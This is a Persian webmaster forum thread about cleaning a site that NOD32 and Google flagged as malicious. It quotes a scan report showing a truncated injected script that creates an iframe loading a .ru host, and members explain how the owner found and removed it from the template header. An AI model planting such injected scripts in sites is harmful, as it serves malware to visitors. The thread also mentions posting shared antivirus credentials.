شناسایی سایتم به عنوان سایت حاوی تروجان (فقط توسط نود32)

[hnikdel]

با سلام خدمت دوستان.
نود32 هنگامی که سایت رو باز میکنم پیغام میده که سایت حاوی این تروجان هست: js/frame.gt trojan
آدرس سایت: www.khodemooni.net
سایت توسط گوگل ، به عنوان مخرب شناسایی شده
لطفا راهنمایی کنید چطور میتونم این مشکل رو برطرف کنم.

با تشکر

 

[hamid_shahrsaz]

با کرم هم باز نمیشه
احتمالا یوزر و پس نود گذاشتی تو سایتت

 

[hnikdel]

با کرم هم باز نمیشه
احتمالا یوزر و پس نود گذاشتی تو سایتت

بله گذاشتم
مشکل از اینه.
لطفا دوستان کمک کنند تا ببینیم دقیقا مشکل از چیه؟

 

[Hamid2day]

بله مشکل از همین هست

 

[rasool15]

عزیز کی گفته نود 32 بلاک کرده؟
چند وقته اینجوری شده؟
تو گوگل وبمستر ثبت کردی سایت رو؟

اینا رو بگو راه حل مناسبی بگم تو دو روز مشکل حل بشه.

پ.ن : این بلاک مربوط به گوگل هست و دلیل اون تشخیص کد مخرب در سایت هست.

 

[Hamid2day]

مسدود سازی از طریق گوگل را می تونید از طریق گوگل وب مستر پیگیری کنید که کدوم صفحات آلوده هستن.

توی نتایج گوگل هم رتبه شما میاد پایین و در مواقعی حذف میشه

 

[hnikdel]

تو گوگل وبمستر ثبت کردی سایت رو؟
چند وقته اینجوری شده؟

امروز، بله، اونجا هم همین پیغام رو میده.
سایت دارای کد بد افزار هست. توی فایل function قالب اون کد مخرب معروف وجود نداشت.

مسدود سازی از طریق گوگل را می تونید از طریق گوگل وب مستر پیگیری کنید که کدوم صفحات آلوده هستن.

سایت توسط گوگل، و فایرفاکس مخرب شناخته شده.
وقتی که سایت ویروشی باشه، فرقی نداره چه صفحه ای باشه، گوگل تمام صفحات سایتم رو ویروسی میدونه

 

[rasool15]

مطمئنی به انتهای فانکشن کد اضافه نشده؟
ارور گوگل رو دقیق اینجا بزار بهتر بررسی بشه.

پ.ن : امکان داره به هر فایلی در قالب کد مخرب اضافه بشه.

 

[hnikdel]

سایت زیر، کد مخربی که در سایتم بکار رفته شده رو دقیقاً نشون میده:
Web page security report

طبق این گزارش، خط زیر در یکی از فایلهای سایتم بکار رفته شده، ولی نمی دونم این خط در کدوم فایل هست.

[h=4]Suspicious Inline Scripts[/h] Long suspicious script

(function () { var t = document.createElement('iframe'); t.src = 'http://ahtiagge.ru/count27....



ajax.googleapis.com safe? - displaying 1 of 1
<Script> link - https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js?ver=1.6.1
منتظر یاری سبزتان هستیم

 

[pcyord]

یوزر و پسورد گذاشتید حتما !

 

[rasool15]

سایت زیر، کد مخربی که در سایتم بکار رفته شده رو دقیقاً نشون میده:
Web page security report

طبق این گزارش، خط زیر در یکی از فایلهای سایتم بکار رفته شده، ولی نمی دونم این خط در کدوم فایل هست.

[h=4]Suspicious Inline Scripts[/h] Long suspicious script

(function () { var t = document.createElement('iframe'); t.src = 'http://ahtiagge.ru/count27....



ajax.googleapis.com safe? - displaying 1 of 1
<Script> link - https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js?ver=1.6.1
منتظر یاری سبزتان هستیم

عزیز فک نکنم خیلی زمان ببره که فایلهای قالب رو بگردی و کد رو پیدا کنی
تو هر فایلی میتونه باشه

در درجه اول function و در درجه دوم حتما فوتر رو بگرد
پ.ن : برای راحتی در سرچ یکی از کلمات کد رو کپی و در قسمت سرچ وارد کن.

 

[hnikdel]

ممنون
دقیقاً این کد در فایل header قالب بود برداشتم.
با تشکر از دوستان که راهنمایی کردند بخصوص آقا رسول عزیز.
Thanks

 

[rasool15]

ممنون
دقیقاً این کد در فایل header قالب بود برداشتم.
با تشکر از دوستان که راهنمایی کردند بخصوص آقا رسول عزیز.
Thanks

خواهش میکنم.
میخواستم بگم فوتر و هدر ، که خودتون پیدا کردید
در ضمن سطح دسترسی فایلهای مهم رو که تغییر نمیدی بزار رو 444
تو گوگل اگر تونستی رفع مشکل رو اطلاع بده تا زودتر از بلاک در بیایی ، البته اگر گوگل بررسی داره رو سایتت حتما خود بخودی از بلاک در میاد

موفق باشی.

 

[hnikdel]

خواهش میکنم.
میخواستم بگم فوتر و هدر ، که خودتون پیدا کردید
در ضمن سطح دسترسی فایلهای مهم رو که تغییر نمیدی بزار رو 444
تو گوگل اگر تونستی رفع مشکل رو اطلاع بده تا زودتر از بلاک در بیایی ، البته اگر گوگل بررسی داره رو سایتت حتما خود بخودی از بلاک در میاد

موفق باشی.

تو گوگل وبمستر، همون لحظه درخواست تجدید نظر دادم.
ممنون بابت راهنماییت

 

[hesamraisi]

چه جالب!

 

[hnikdel]

نود 32 آیا یه آپدیت آفلاین هم گیر میده یا فقط به یوزرنیم پسورد گیر میده ؟

 

[AMD.POWER]

به هر دو هم اپديت آفلاين هم يوزر و پسورد .

 

[hnikdel]

40 درصد از سایت در گوگل مشکلی نداره.
ولی سه مشکل هنوز است.
1. برخی لینکهای سایت پس از دو هفته از پاکسازی ویروس، هنوز در گوگل به عنوان صفحه دارای کد مخرب شناسایی میشن. این در حالی هست که هیچ آنتی ویروس و یا سایتی، سایت ما رو به عنوان بد افزار شناسایی نمی کنه. بنظر میاد تمام لینکهای tag در سایت رو به عنوان ویروس شناسایی میکنه. ببینید: https://www.google.com/search?clien...rceid=opera&ie=utf-8&oe=utf-8&channel=suggest

2. در گوگل وب مستر، هنوز برای سایتم پیغام ویروس میده.

* این لینک رو بررسی کنید ببینید چی دستگیرتون میشه: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=khodemooni.net

با تشکر